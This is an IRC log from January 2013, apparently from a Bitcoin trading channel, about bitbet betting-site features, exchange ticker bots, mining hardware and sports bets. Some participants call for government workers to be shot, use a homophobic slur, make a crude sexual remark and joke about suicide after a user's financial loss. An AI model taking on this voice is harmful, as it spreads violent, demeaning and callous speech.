reals. Jan 08 00:08:22 Bugpowder i still dunno how to specify decay tho. Jan 08 00:08:43 i guess i could do two-point linear three point polynomial four point spline Jan 08 00:08:58 except i doubt there's five ppl in btc who could read and comprehend the faq for that in one pass. Jan 08 00:10:25 Linear is fine for some events Jan 08 00:10:37 actually linear is probably ok for all events Jan 08 00:10:58 just have a selectable slope, i.e. final decay point Jan 08 00:11:17 all decay starts say 100k ends *user selected* ? Jan 08 00:11:25 0 for stochasitic occuring events Jan 08 00:11:43 err Jan 08 00:11:59 0 for events that could be triggered at any time (ie earthquake) Jan 08 00:12:09 im really thinking maybe dump decay entirely. Jan 08 00:12:17 naw Jan 08 00:12:32 I can see the utitility for things like earthwuake Jan 08 00:12:37 or BFL shipping Jan 08 00:12:43 this is also true Jan 08 00:12:46 as time progresses... Jan 08 00:12:53 BFL shipped today :D Jan 08 00:13:01 85,000 for binary events taht occur once at a known time (sporting event) Jan 08 00:13:08 check's in the mail Jan 08 00:13:09 FPGAs? Jan 08 00:13:11 my new PSU, the other died yesterday Jan 08 00:13:15 ;) Jan 08 00:13:27 for free Jan 08 00:13:53 85,000 / 2^(n-1) for sporting tournaments where n is the number of rounds and you are betting on the winner (maybe) Jan 08 00:14:06 1 day shipping , new record, got the tracking code Jan 08 00:14:11 maybe 100,000 / 2^(n-1) for that Jan 08 00:14:24 BFL CAN ship in 1 day :D Jan 08 00:15:04 had one ordered on ebay before contacting BFL though Jan 08 00:15:35 let see which one comes first Jan 08 00:19:11 whatcha ordered? Jan 08 00:19:14 fpga or fpga? Jan 08 00:19:33 i say a BFL single on ebay starting at 600 the other day Jan 08 00:19:45 why i was on ebay i shudder to remember Jan 08 00:21:37 don't make obama fire a tornado at you Jan 08 00:21:42 gtfo lol Jan 08 00:24:32 I oredered a new PSU, send them an email yesterday and they offered a new PSU for free and its already in the mail Jan 08 00:31:18 jcpham what's a single worth these days ? Jan 08 00:36:18 [MPEX] [O.BTCUSD.P140T] 96 @ 0.13595559 = 13.0517 BTC [-] Jan 08 00:39:35 ;;ticker Jan 08 00:39:36 BTCUSD ticker | Best bid: 13.50000, Best ask: 13.54467, Bid-ask spread: 0.04467, Last trade: 13.54467, 24 hour volume: 23705.29840652, 24 hour low: 13.40400, 24 hour high: 13.58900, 24 hour vwap: 13.49859 Jan 08 00:39:52 BREAKOUT Jan 08 00:39:57 WEEKLY HIGH Jan 08 00:41:31 o hey. Jan 08 00:41:38 no wonder calls were selling earlier Jan 08 00:41:47 o, and it looks like bbet will be oversubscribed. Jan 08 00:41:57 ?? Jan 08 00:42:14 o Jan 08 00:42:17 I c Jan 08 00:42:36 They saw all the sports action Jan 08 00:42:41 lol Jan 08 00:42:49 lol Jan 08 00:42:57 may be. Jan 08 00:43:40 it occurs to me, the logical thing would be for someone with little capital but a journalism degree to start a bitcoin financials blog Jan 08 00:43:54 just the tips he can pick up idling in this chan are enough to guarantee success. Jan 08 00:44:21 arg Jan 08 00:44:43 kalkobrekla was wrong about the bet closing time Jan 08 00:45:10 mircea_popescu: last I checked OneFixt was making fuck all doing that Jan 08 00:45:28 mircea_popescu: via IRC tho, not blawg Jan 08 00:45:38 " like start of the day or end of day midnight GMT [15:03] ? [15:03] 00:00 or 24:00 :) [15:04] end" Jan 08 00:45:59 actually it looks like its start of day, based on the cutoff times on the website. Jan 08 00:46:01 Oops Jan 08 00:46:01 dub blog. it matters. Jan 08 00:46:18 blogs are huge Jan 08 00:46:24 if you have high quality content Jan 08 00:46:24 yeah. i know cause i run one. Jan 08 00:46:28 me too Jan 08 00:46:37 ya but yours doesn't charge. Jan 08 00:46:46 mine enhances my repuation Jan 08 00:46:51 mine does too. Jan 08 00:46:54 lots of people know me Jan 08 00:46:57 i get chicks writing for fucking advice. Jan 08 00:46:57 in science Jan 08 00:46:59 via the blog Jan 08 00:47:10 i guess each his own huh :D Jan 08 00:47:45 haha atlanta 6.02:6.01 ?! noway, even odds ? Jan 08 00:47:47 13.59 Jan 08 00:48:00 http://bitbet.us/bet/50/ Jan 08 00:48:13 well atlanta is actually favored 3:2 Jan 08 00:48:25 mircea_popescu: why not bet title in the uri? Jan 08 00:48:29 but I like the seahawks Jan 08 00:49:15 Anduck now that's a great q. Jan 08 00:49:23 i guess we're too dumb to have thought of that. Jan 08 00:49:45 Bugpowder you're on, dawg. Jan 08 00:50:03 there ya go Jan 08 00:50:04 http://bitbet.us/bet/50/why-not-bet-title-in-the-uri/ Jan 08 00:50:07 sorry was out again Jan 08 00:50:18 umm yeah bugpowder i checked b4 as i said Jan 08 00:50:33 but i forgot to tell you looks like its the start of that day that ends the bet Jan 08 00:50:44 if its ends on the first of feb Jan 08 00:50:59 mircea_popescu: fix it Jan 08 00:50:59 xD Jan 08 00:51:00 lol kakobrekla Jan 08 00:51:02 it will end first of feb Jan 08 00:51:04 *improve it Jan 08 00:51:06 the idea is for the bet to use the name omg Jan 08 00:51:14 as long as its short? Jan 08 00:51:21 ya just put whatever after the id Jan 08 00:51:24 use first 125 chars Jan 08 00:51:31 kakobrekla ya but the idea is to not have to type it out Jan 08 00:51:40 myeah Jan 08 00:51:41 when i rightclick on a bet, i wanna copy the named url Jan 08 00:51:42 fine fine Jan 08 00:51:43 [MPEX] [S.DICE] 1000 @ 0.00471151 = 4.7115 BTC [+] Jan 08 00:51:44 [MPEX] [S.DICE] 1823 @ 0.00471152 = 8.5891 BTC [+] Jan 08 00:51:46 u could see the bet from the URI itself!!! Jan 08 00:51:53 u dont need to open the link Jan 08 00:51:54 elf!!! Jan 08 00:51:55 memorize them Jan 08 00:51:57 to see what the bet is for Jan 08 00:52:26 http://bitbet.us/bet/53/kakobrekla-is-not-a-real-coder Jan 08 00:52:41 that works as well Jan 08 00:52:52 well it's a problem! Jan 08 00:53:00 why? Jan 08 00:53:07 its intentionally so Jan 08 00:53:16 just because of that reason Jan 08 00:53:23 cause someone will want that juice in the url Jan 08 00:53:35 and i can add it in a minute or 10 Jan 08 00:53:38 :) Jan 08 00:53:50 do it Jan 08 00:53:53 Anduck you know, for this very valuable obvious observation you get 1 btc Jan 08 00:54:05 i need coffee first. Jan 08 00:54:06 pick a bet, put an addy in, paste where the btc should go and i'll send it Jan 08 00:54:21 mircea_popescu: thank you, i'll pick one! haha Jan 08 00:56:20 mircea_popescu: http://bitbet.us/bet/26/ addr 1L9AstSVETkdjk8o3Uev5Ue8vbjASxRm8G aaand i pick NO Jan 08 00:56:29 no way gavin is giving up yet Jan 08 00:56:53 sent. Jan 08 00:58:06 accidently gave u my own address lol Jan 08 00:58:12 thanks, sent it to bet addr now Jan 08 00:58:16 lol k Jan 08 01:21:37 [MPEX] [S.DICE] 2469 @ 0.00470145 = 11.6079 BTC [-] Jan 08 01:45:15 [MPEX] [O.BTCUSD.C100T] 300 @ 0.36086651 = 108.26 BTC [-] Jan 08 01:45:31 [MPEX] [O.BTCUSD.C120T] 800 @ 0.24098641 = 192.7891 BTC [+] Jan 08 01:45:33 [MPEX] [O.BTCUSD.C110T] 500 @ 0.2969264 = 148.4632 BTC [-] Jan 08 01:47:21 come on Jan 08 01:47:25 buy the fucking 130s Jan 08 01:48:18 ... no Jan 08 01:53:43 lol Jan 08 01:53:53 Namworld did you get my later msg Jan 08 01:54:45 no, which one? Jan 08 01:56:01 19:29.44 ( kakobrekla ) ;;later tell namworld PS, somebody please tell bitvps to fix their SSL certificate, I can't pay my bill with them until they do this. If they don't get their act together right-quick I'm dropping them from the signcryption network. I've been pestering them about this for two weeks now and am pretty unimpressed with the lack of any sort of response. Jan 08 01:56:01 19:29.45 ( gribble ) The operation succeeded. Jan 08 01:56:04 this one Jan 08 01:56:19 from ET Jan 08 01:56:39 fuckin space aliens using bvps Jan 08 01:57:14 whats bbet ? Jan 08 01:57:35 Ukto http://bitbet.us/ Jan 08 01:58:18 .. Jan 08 01:58:19 mp Jan 08 01:58:27 this looks awfully familiar to another site i recently linked you Jan 08 01:58:30 :P Jan 08 01:58:37 is this the same site just redone ? Jan 08 01:58:43 or a diff site knocking them off Jan 08 01:58:58 um Jan 08 01:59:04 which ? Jan 08 01:59:12 the one with the baby? Jan 08 01:59:16 i wann say it was called bitbet Jan 08 01:59:19 nah Jan 08 01:59:25 it worked teh exact same way Jan 08 01:59:27 just a diff look Jan 08 01:59:33 too lazy to dig thru logs Jan 08 01:59:39 hm? Jan 08 01:59:41 now im curious Jan 08 02:00:23 the only one that has simmilar system is betsofbitcoin Jan 08 02:00:38 http://betsofbitco.in Jan 08 02:00:43 yeah Jan 08 02:00:43 a. Jan 08 02:01:02 ya is not the same Jan 08 02:01:02 [MPEX] [S.MPOE] 10000 @ 0.00063604 = 6.3604 BTC [-] Jan 08 02:01:03 [MPEX] [S.MPOE] 6200 @ 0.00063603 = 3.9434 BTC [-] Jan 08 02:01:11 apparently :P Jan 08 02:01:28 Oh, I see it. Jan 08 02:01:36 I never read the gribble window =/ Jan 08 02:01:53 well, you are welcome Jan 08 02:01:55 :p Jan 08 02:02:03 When I log in, I get auto-authed Jan 08 02:02:15 so the window flash anyway and I don't manually check it. Jan 08 02:02:28 I just assume it's my usual authing. Jan 08 02:02:56 [MPEX] [S.MPOE] 5900 @ 0.00064339 = 3.796 BTC [+] Jan 08 02:02:57 [MPEX] [S.MPOE] 10000 @ 0.00065038 = 6.5038 BTC [+] Jan 08 02:02:59 [MPEX] [S.MPOE] 900 @ 0.00065039 = 0.5854 BTC [+] Jan 08 02:03:57 Why do you ask me to tell BitVPS something? I was not aware BitVPS was a person. Jan 08 02:04:18 [MPEX] [S.DICE] 901 @ 0.00463113 = 4.1726 BTC [-] Jan 08 02:11:49 [MPEX] [S.DICE] 530 @ 0.00463113 = 2.4545 BTC [-] Jan 08 02:11:50 [MPEX] [S.DICE] 550 @ 0.00464578 = 2.5552 BTC [+] Jan 08 02:11:52 [MPEX] [S.DICE] 719 @ 0.00471152 = 3.3876 BTC [+] Jan 08 02:17:26 [MPEX] [S.MPOE] 3642 @ 0.00063603 = 2.3164 BTC [-] Jan 08 02:17:27 [MPEX] [S.MPOE] 3435 @ 0.0006352 = 2.1819 BTC [-] Jan 08 02:19:12 [MPEX] [S.DICE] 2397 @ 0.00464456 = 11.133 BTC [-] Jan 08 02:41:34 [MPEX] [S.MPOE] 22200 @ 0.00065039 = 14.4387 BTC [+] Jan 08 02:42:54 does S.MPOE or s.dice have a higher market cap? Jan 08 02:43:07 stupid hotel dns taking me to Midwest Photo EXchange Jan 08 02:43:40 !ticker S.MPOE Jan 08 02:43:41 [MPEX:S.MPOE] 1day: 0.0006352 / 0.00064186 / 0.00065144 (256905 shares, 164.90 BTC), 30day: 0.0005119 / 0.00060777 / 0.00066 (53942947 shares, 32,784.98 BTC) Jan 08 02:43:49 !ticker S.DICE Jan 08 02:43:51 [MPEX:S.DICE] 1day: 0.004312 / 0.00463033 / 0.0047888 (110857 shares, 513.30 BTC), 30day: 0.0014 / 0.00334413 / 0.0048 (13774781 shares, 46,064.74 BTC) Jan 08 02:44:01 pigeons: try mpex.co, not com Jan 08 02:44:20 yeah tell my browser not to try .com when my dns doesnt answer for .co Jan 08 02:44:24 [MPEX] [S.DICE] 1996 @ 0.00464456 = 9.2705 BTC [-] Jan 08 02:44:29 :D Jan 08 02:44:29 lol Jan 08 02:44:50 then use polimedia.us/bitcoin/mpex.php Jan 08 02:45:50 that redirects to .co Jan 08 02:46:08 which i don't get a dns response for Jan 08 02:46:15 so my browser tries .com Jan 08 02:46:36 anyway, working now Jan 08 02:51:35 Lambert? Jan 08 02:52:47 [MPEX] [S.DICE] 1000 @ 0.0046095 = 4.6095 BTC [-] Jan 08 02:52:48 [MPEX] [S.DICE] 1100 @ 0.00460951 = 5.0705 BTC [+] Jan 08 02:59:02 [MPEX] [S.DICE] 1234 @ 0.00460951 = 5.6881 BTC [+] Jan 08 02:59:04 [MPEX] [S.DICE] 158 @ 0.00471152 = 0.7444 BTC [+] Jan 08 02:59:36 What? Jan 08 02:59:57 Just wondering if it was you. I recall seeing you around the forums. Jan 08 03:00:14 This be a small community indeed. Jan 08 03:00:17 Oh,ok. Just me. Jan 08 03:01:12 [MPEX] [S.MPOE] 10588 @ 0.00065038 = 6.8862 BTC [-] Jan 08 03:04:19 PeterL Jan 08 03:04:20 still there? Jan 08 03:04:29 I was actually just thinking about contacting you Jan 08 03:05:01 ok, so if anyone interested, bitbet advertising seems like a decent revenue stream too. Jan 08 03:05:33 it works on a rotator model whereby people can send btc and figure proportionally with the total paid. Jan 08 03:05:40 all revenue goes to 1CnqxD4NnRsukc1Ni2oZR3ERc2g2WVnqw so it can be easily audited Jan 08 03:05:44 so far ~22 btc in there. Jan 08 03:12:14 pigeons how about .ws ? Jan 08 03:12:38 [MPEX] [S.DICE] 1650 @ 0.00473622 = 7.8148 BTC [+] Jan 08 03:16:01 everything's working now, .ws too Jan 08 03:17:48 [MPEX] [S.MPOE] 9412 @ 0.00065038 = 6.1214 BTC [-] Jan 08 03:17:49 [MPEX] [S.MPOE] 3070 @ 0.00065039 = 1.9967 BTC [+] Jan 08 03:17:50 [MPEX] [S.MPOE] 9918 @ 0.00065196 = 6.4661 BTC [+] Jan 08 03:23:43 was anopther one, i forget Jan 08 03:25:45 [MPEX] [O.BTCUSD.C130T] 54 @ 0.192 = 10.368 BTC [+] Jan 08 03:25:46 [MPEX] [O.BTCUSD.C130T] 296 @ 0.19427821 = 57.5064 BTC [+] Jan 08 03:28:54 [MPEX] [S.DICE] 1000 @ 0.00478879 = 4.7888 BTC [+] Jan 08 03:28:56 [MPEX] [S.DICE] 1500 @ 0.0047888 = 7.1832 BTC [+] Jan 08 03:33:02 [MPEX] [S.DICE] 350 @ 0.00473622 = 1.6577 BTC [-] Jan 08 03:33:03 [MPEX] [S.DICE] 546 @ 0.00473621 = 2.586 BTC [-] Jan 08 03:36:33 forget bitcoins, http://www.dailymail.co.uk/news/article-2258711/Grime-wave-Surge-theft-Tide-laundry-detergent-used-hard-currency-buy-crack-street.html Jan 08 03:39:31 roll tide? Jan 08 03:40:03 you saw that touchdown? Jan 08 03:40:05 shit is elite Jan 08 03:40:19 they start already? Jan 08 03:40:21 doh Jan 08 03:40:39 thought it was at 8pm Jan 08 03:41:08 lacy walked in with the first td\ Jan 08 03:41:17 irish is down Jan 08 03:42:43 after 25 ass slaps and only 487 minutes of advertising Jan 08 03:43:14 ncaa used to not be so bad Jan 08 03:43:38 [MPEX] [S.DICE] 761 @ 0.00472911 = 3.5989 BTC [-] Jan 08 03:47:55 wow Jan 08 03:47:58 some bad calls Jan 08 03:48:29 [MPEX] [S.MPOE] 5000 @ 0.00064354 = 3.2177 BTC [-] Jan 08 03:49:00 i may have to get off irc Jan 08 03:49:05 and start drinking Jan 08 03:49:11 the way this is going Jan 08 03:52:13 [MPEX] [S.MPOE] 20392 @ 0.00064354 = 13.1231 BTC [-] Jan 08 03:56:24 [MPEX] [S.MPOE] 9400 @ 0.00064354 = 6.0493 BTC [-] Jan 08 03:56:25 nah Jan 08 03:58:02 lol Jan 08 03:58:03 fumble Jan 08 03:58:08 dub i bet you the crack you buy for tide has tide in it. Jan 08 03:58:27 game over Jan 08 03:58:29 ;) Jan 08 03:58:59 whoa Jan 08 03:59:01 everybody http://bitbet.us/browse/ put nfl in and bet :D Jan 08 03:59:13 if they review that and still call it a fumble Jan 08 03:59:18 the game is fixed Jan 08 03:59:21 i want t o design a sports book so bad Jan 08 03:59:44 that has vegas odds and such Jan 08 04:00:08 i just gave someone a million dollar idea Jan 08 04:00:14 go forth and multiply Jan 08 04:01:50 oh shit, a million dollar idea? i've been waiting for one of those Jan 08 04:02:46 do dawg i heard you like tide in your crack Jan 08 04:04:03 [MPEX] [S.DICE] 900 @ 0.00467825 = 4.2104 BTC [-] Jan 08 04:05:37 http://techcrunch.com/2013/01/07/bitpay-banks-500k-in-angel-investment-to-become-paypal-for-bitcoin-already-has-2100-businesses-on-board/ Jan 08 04:06:05 nice Jan 08 04:07:24 jcpham bugpowder was saying the exact sdame thing Jan 08 04:08:01 http://cupsandcakesbakery.com/2012/10/buy-cupcakes-with-bitcoins/ Jan 08 04:13:35 !ticker s.dice Jan 08 04:13:36 [MPEX:S.DICE] 1day: 0.004312 / 0.00464061 / 0.0047888 (117830 shares, 546.80 BTC), 30day: 0.0014 / 0.00334532 / 0.0048 (13784976 shares, 46,115.26 BTC) Jan 08 04:13:38 ;;ticker Jan 08 04:13:39 BTCUSD ticker | Best bid: 13.59378, Best ask: 13.63974, Bid-ask spread: 0.04596, Last trade: 13.59377, 24 hour volume: 31951.91670253, 24 hour low: 13.40400, 24 hour high: 13.72999, 24 hour vwap: 13.53367 Jan 08 04:15:47 [MPEX] [S.MPOE] 12700 @ 0.00064354 = 8.173 BTC [-] Jan 08 04:19:41 BREAKOUT Jan 08 04:19:45 [MPEX] [S.DICE] 2000 @ 0.00457186 = 9.1437 BTC [-] Jan 08 04:19:46 [MPEX] [S.DICE] 242 @ 0.00457185 = 1.1064 BTC [-] Jan 08 04:19:48 thank you for buying the 1302 Jan 08 04:19:53 130s Jan 08 04:24:16 http://www.foxnews.com/politics/2013/01/07/funny-money-pundits-float-1-trillion-coin-as-answer-to-debt-ceiling-standoff/%20?test=latestnews Jan 08 04:24:17 heh Jan 08 04:25:08 fox news Jan 08 04:25:20 is a constant source of worry Jan 08 04:25:27 for those who like to worry Jan 08 04:26:05 as I said.... the people who say the most bullshit things get the most press, for a while Jan 08 04:29:25 heh. Jan 08 04:29:30 not so sure about that. Jan 08 04:34:39 The gov should just start mining coins Jan 08 04:35:43 [MPEX] [S.DICE] 1944 @ 0.0046308 = 9.0023 BTC [+] Jan 08 04:36:01 ;;ticker Jan 08 04:36:19 gribbler Jan 08 04:36:28 whassup? Jan 08 04:37:03 BTCUSD ticker | Best bid: 13.63401, Best ask: 13.64997, Bid-ask spread: 0.01596, Last trade: 13.63401, 24 hour volume: 31774.26076992, 24 hour low: 13.40400, 24 hour high: 13.72999, 24 hour vwap: 13.53397 Jan 08 04:44:59 [MPEX] [S.DICE] 2450 @ 0.00460593 = 11.2845 BTC [-] Jan 08 04:45:00 [MPEX] [S.DICE] 1346 @ 0.00457186 = 6.1537 BTC [-] Jan 08 04:51:04 Rep. Jerrold Nadler, D-N.Y., told Capital New York that the "out of the ordinary" idea could actually work. Jan 08 04:51:04 "I'm being absolutely serious," he said. "It sounds silly, but it's absolutely legal." Jan 08 04:51:12 dude... legal and works are motherfucking worlds apart Jan 08 04:51:40 the best thing the us could do right now is simply have everyone everyone in washington that ever worked for the govt round up and shot Jan 08 04:51:54 just some ass that wants his name in print Jan 08 04:52:12 way better than some douchy coin Jan 08 04:52:27 Bugpowder no see, he;'s not just some ass, he's an elected rep. Jan 08 04:55:32 "The likelihood of this happening is about as likely as the checkers scenario. But the argument in its favor is that minting a trillion-dollar coin is a commensurately ridiculous response to Congress refusing to pay debts it has already accumulated. " Jan 08 04:55:33 mno. Jan 08 04:55:52 this ain't at all the case. congress refusal to lift the ceiling for the 100th time is pretty much the only sane thing going on atm. Jan 08 04:56:12 and specifically it was NOT congress that accumulated any debt. it was the obama lackeys Jan 08 04:56:15 let him pay them Jan 08 04:56:21 [MPEX] [S.DICE] 1256 @ 0.0046308 = 5.8163 BTC [+] Jan 08 04:56:23 [MPEX] [S.DICE] 500 @ 0.00465993 = 2.33 BTC [+] Jan 08 04:56:24 he has awife, she can work, i'd do 10 bux for a blowjob. Jan 08 04:56:24 [MPEX] [S.DICE] 44 @ 0.00467825 = 0.2058 BTC [+] Jan 08 05:00:58 BREAKOUT Jan 08 05:00:59 ;;ticker Jan 08 05:00:59 BTCUSD ticker | Best bid: 13.68126, Best ask: 13.69898, Bid-ask spread: 0.01772, Last trade: 13.69899, 24 hour volume: 33966.24160877, 24 hour low: 13.40400, 24 hour high: 13.72999, 24 hour vwap: 13.54459 Jan 08 05:01:16 fuck that Jan 08 05:01:23 These are the highest sports bets on betsofbitcoin Jan 08 05:01:25 http://betsofbitco.in/list?status=available&category=Sports&sorting=-totalBets Jan 08 05:01:33 this is the middle of the NFL playoffs Jan 08 05:02:50 doesn't seem like much Jan 08 05:02:58 its embarassing Jan 08 05:03:11 there is over 1BB bet on the playoffs Jan 08 05:03:20 legally Jan 08 05:03:32 bitcoin cant get ANY of it? Jan 08 05:03:42 not even 0.00001%? Jan 08 05:04:26 heh well, apparently not quite this year. Jan 08 05:04:38 tho, two years ago bitcoin couldn't hardly buy a pizza, so, it's a curve. Jan 08 05:04:43 well Jan 08 05:04:54 betsofbitcoin had more NFL bets last year Jan 08 05:05:03 iirc Jan 08 05:05:22 mostly because I placed them :-P Jan 08 05:06:30 lol Jan 08 05:09:35 13.70 Jan 08 05:12:30 13.71! Jan 08 05:12:43 hm nice Jan 08 05:14:14 ;;ticker Jan 08 05:14:15 BTCUSD ticker | Best bid: 13.68126, Best ask: 13.68501, Bid-ask spread: 0.00375, Last trade: 13.68125, 24 hour volume: 35430.52112454, 24 hour low: 13.40400, 24 hour high: 13.72999, 24 hour vwap: 13.55233 Jan 08 05:14:29 low volume tho Jan 08 05:15:18 no Jan 08 05:15:21 high volume Jan 08 05:15:41 since it has been goin up at least Jan 08 05:16:07 not huge Jan 08 05:16:09 but solid Jan 08 05:16:33 ~5,000/hr Jan 08 05:16:38 for the last 8 Jan 08 05:17:21 thats well above the recent average over a timescale of more than 2-3 hours Jan 08 05:17:35 and I have a feeling its not done Jan 08 05:17:37 hmmm Jan 08 05:17:44 it IS a monday.... Jan 08 05:17:46 or was Jan 08 05:18:06 now we just need the S.DICE whales to come back and shit will be rockin Jan 08 05:18:17 ;;ticker Jan 08 05:18:18 BTCUSD ticker | Best bid: 13.63591, Best ask: 13.70999, Bid-ask spread: 0.07408, Last trade: 13.63590, 24 hour volume: 36239.15878320, 24 hour low: 13.40400, 24 hour high: 13.72999, 24 hour vwap: 13.55595 Jan 08 05:18:41 Also... approaching the Dec 14th high Jan 08 05:18:42 hehe we see Jan 08 05:19:06 after that, its a post-pirate high Jan 08 05:20:28 And that was basically an interday high Jan 08 05:20:34 intraday high Jan 08 05:21:16 well, express yourself here http://bitbet.us/bet/16/ Jan 08 05:27:13 [MPEX] [S.MPOE] 11000 @ 0.00064312 = 7.0743 BTC [-] Jan 08 05:27:15 [MPEX] [S.MPOE] 5517 @ 0.00064311 = 3.548 BTC [-] Jan 08 05:30:55 and hopefully the whale loses, I want dividends Jan 08 05:31:32 there are no profits yet, revenue has been low, except me losing some coins :P Jan 08 05:39:06 be patient Jan 08 05:39:17 its usually a week between appearances Jan 08 05:41:23 I just dumped my shares on bitfunder, meh :P Jan 08 05:41:26 [MPEX] [S.MPOE] 4731 @ 0.00064354 = 3.0446 BTC [+] Jan 08 05:41:31 [MPEX] [S.MPOE] 26769 @ 0.00064497 = 17.2652 BTC [+] Jan 08 05:41:58 [MPEX] [S.DICE] 802 @ 0.00461807 = 3.7037 BTC [-] Jan 08 05:41:59 [MPEX] [S.DICE] 198 @ 0.00457186 = 0.9052 BTC [-] Jan 08 05:43:15 to do what else with it, exactly? Jan 08 05:47:21 rob the dice Jan 08 05:47:22 ;O Jan 08 05:49:42 1.9% profit is too low, stock price too high, price will fall when price to dollar goes up I think, I just had too many... :P Jan 08 05:51:36 [MPEX] [S.DICE] 3150 @ 0.00464989 = 14.6472 BTC [+] Jan 08 05:51:38 [MPEX] [S.DICE] 456 @ 0.00467825 = 2.1333 BTC [+] Jan 08 05:51:39 [MPEX] [S.DICE] 771 @ 0.00468222 = 3.61 BTC [+] Jan 08 05:51:40 [MPEX] [S.DICE] 5250 @ 0.0046881 = 24.6125 BTC [+] Jan 08 05:51:41 [MPEX] [S.DICE] 373 @ 0.00469803 = 1.7524 BTC [+] Jan 08 05:53:44 ;;bc,stats Jan 08 05:53:46 Current Blocks: 215664 | Current Difficulty: 2979636.6169381 | Next Difficulty At Block: 215711 | Next Difficulty In: 47 blocks | Next Difficulty In About: 7 hours, 22 minutes, and 35 seconds | Next Difficulty Estimate: 3242850.21341859 | Estimated Percent Change: 8.83374821561 Jan 08 05:56:27 lol Jan 08 05:56:46 zorb Jan 08 05:56:47 http://www.youtube.com/watch?feature=player_embedded&v=ASPgOv7GL7o Jan 08 06:06:19 who wants to see me cry? Jan 08 06:07:11 20.01337666 WIN 39.16567812 22359 no one good :P Jan 08 06:08:12 I basically just robbed myself Jan 08 06:08:53 [MPEX] [S.DICE] 956 @ 0.00457186 = 4.3707 BTC [-] Jan 08 06:08:55 [MPEX] [S.DICE] 1208 @ 0.00457185 = 5.5228 BTC [-] Jan 08 06:08:55 [MPEX] [S.DICE] 1036 @ 0.00456935 = 4.7338 BTC [-] Jan 08 06:13:59 [MPEX] [S.DICE] 864 @ 0.00456935 = 3.9479 BTC [-] Jan 08 06:14:00 [MPEX] [S.DICE] 600 @ 0.00454441 = 2.7266 BTC [-] Jan 08 06:14:02 [MPEX] [S.DICE] 436 @ 0.00453597 = 1.9777 BTC [-] Jan 08 06:15:17 439.56800000 LOSE 2.19734000 38552 Jan 08 06:15:21 holy shit :D Jan 08 06:15:52 You just lost to yourself? Jan 08 06:15:57 no wasn't me Jan 08 06:16:04 just saw it ;) Jan 08 06:16:10 Well you must be happy then **** ENDING LOGGING AT Tue Jan 8 06:36:38 2013 **** BEGIN LOGGING AT Tue Jan 8 06:48:06 2013 Jan 08 06:48:44 [MPEX] [S.DICE] 564 @ 0.00457522 = 2.5804 BTC [-] Jan 08 06:54:28 [MPEX] [S.MPOE] 1833 @ 0.00064311 = 1.1788 BTC [-] Jan 08 06:55:48 anybody lost money or bitcoins in Crypto X Change on here? Jan 08 06:56:12 https://bitcointalk.org/index.php?topic=129387.msg1440927#msg1440927 Jan 08 06:56:54 never used them myself Jan 08 06:56:57 did it pack up ? Jan 08 06:57:21 yes Jan 08 06:57:23 i also have never used them Jan 08 06:57:55 i'm so pissed about losing $3300 Jan 08 06:58:10 meh Jan 08 06:58:13 thinking about winding up the company Jan 08 06:58:23 that's one moneth's mortgage Jan 08 06:58:48 3300 might irritate me Jan 08 06:59:00 leotreasure http://trilema.com/2012/and-another-one-bites-the-dust-bitmarketeu/ Jan 08 06:59:16 i live at the very top of a house of cards Jan 08 06:59:17 you have no business keeping too much money on "exchanges" Jan 08 06:59:34 jcpham now why'd you do that ? houses of cards are dafty. Jan 08 07:00:01 my whole country and culture does it Jan 08 07:00:06 i realize it at least Jan 08 07:00:10 that's a faggoty excuse Jan 08 07:00:18 i'm working on it Jan 08 07:00:23 that's much better >D Jan 08 07:00:24 it's a process Jan 08 07:05:25 he could go to a country where suicide is covered by life insurance Jan 08 07:05:50 there's such a country ? Jan 08 07:05:56 aww, shes thinking bout us http://shrani.si/f/19/rN/2d8Tkb6s/think.png Jan 08 07:06:15 yes Jan 08 07:06:26 haha kakobrekla Jan 08 07:06:29 miiiilk Jan 08 07:06:31 in germany suicide is covered after 3 years, before that only if you're crazy Jan 08 07:06:39 mircea_popescu :D Jan 08 07:06:39 ridiculous. Jan 08 07:07:05 you changed the header tho ? Jan 08 07:07:32 the logo doesnt go over the banner anymore, no. Jan 08 07:07:45 ya Jan 08 07:08:10 i had to do it in the end. Jan 08 07:09:22 yeah. Jan 08 07:09:30 i kinda liked it myself, but... yeah. nothing to be done. Jan 08 07:11:54 http://polimedia.us/dtng/c/src/135762189688.jpg << .1 btc to whoever guesses the girl's occupation. Jan 08 07:12:08 balerina Jan 08 07:12:40 "ballerina" Jan 08 07:12:54 hehe right. Jan 08 07:13:39 is it not? Jan 08 07:13:41 yup. Jan 08 07:13:44 addy ? Jan 08 07:14:30 hm, lets place it on a bet Jan 08 07:15:19 lolk Jan 08 07:15:43 Send Bitcoins to: Jan 08 07:15:43 18kjupubYLiCk54XoY4ZReCTGj4NwX7mXU Jan 08 07:15:43 to bet "Yes" on "Bitcoin below 13.00$ before January 15th, 2013 ". Jan 08 07:15:43 Your bet will appear in the confirmed bets list shortly after 1st confirmation. Jan 08 07:16:31 Can I bet there without making an account? Jan 08 07:16:38 yup Jan 08 07:17:06 there ya go http://bitbet.us/bet/53/ Jan 08 07:17:33 kakobrekla do the work man. paste the addy here Jan 08 07:17:40 a ok nm i didnt see it Jan 08 07:17:40 mircea_popescu I DID Jan 08 07:17:46 reading from bottom up hehe Jan 08 07:17:49 Dr-X yes Jan 08 07:18:03 'there ya go' was for dr-x Jan 08 07:19:11 cool, checking out the bets. I think I'm calling my relatives from the andromeda galaxy to visit me soon. Jan 08 07:19:20 :DDD Jan 08 07:19:29 well Jan 08 07:19:35 lemme know if they come in time. Jan 08 07:20:09 one day some of us were chatting and this girl said about her uncle or w/e that they're relatively related. Jan 08 07:20:10 [MPEX] [S.DICE] 550 @ 0.00471893 = 2.5954 BTC [+] Jan 08 07:21:31 sort for market size would be nice Jan 08 07:21:39 there is. Jan 08 07:21:44 to see where's the money at Jan 08 07:21:46 click on bitbet logo on the left Jan 08 07:22:41 oh ok Jan 08 07:22:45 good to know Jan 08 07:22:51 i will add order by bets sum in teh order by field in the browse soonish Jan 08 07:23:05 thx, yeah was searching for that ;) Jan 08 07:23:08 been buged about this for a couple of times now Jan 08 07:27:46 yeah cool, just made a bet Jan 08 07:28:36 thank you for your patronage hehe Jan 08 07:38:58 yeah, just made more. I think I gave you 0.2 for the lulz :P Jan 08 07:39:39 submit a suggestion for a bet if you come up with something fresh Jan 08 07:39:52 !ticker s.dice Jan 08 07:39:54 [MPEX:S.DICE] 1day: 0.004312 / 0.0046243 / 0.0047888 (134087 shares, 620.06 BTC), 30day: 0.0014 / 0.00334889 / 0.0048 (13823119 shares, 46,292.13 BTC) Jan 08 07:40:58 australian open is soon, so maybe some tennis? Jan 08 07:41:33 satoshi max bet is up to 500BTC Jan 08 07:41:38 nice Jan 08 07:41:49 that could 